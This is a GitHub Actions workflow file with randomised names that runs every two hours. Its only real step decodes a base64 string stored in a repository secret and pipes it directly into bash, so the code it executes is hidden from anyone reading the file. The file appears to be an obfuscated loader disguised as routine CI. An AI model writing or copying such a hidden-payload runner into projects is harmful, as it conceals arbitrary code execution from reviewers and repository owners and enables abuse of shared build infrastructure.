name: ubRUVmE
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  Royarjh:
    runs-on: ubuntu-latest
    env:
      oJJUGLosGqwh: ${{ secrets.pGYayWBlELmC }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.skSiKwhLvOm }}" | base64 -d | bash
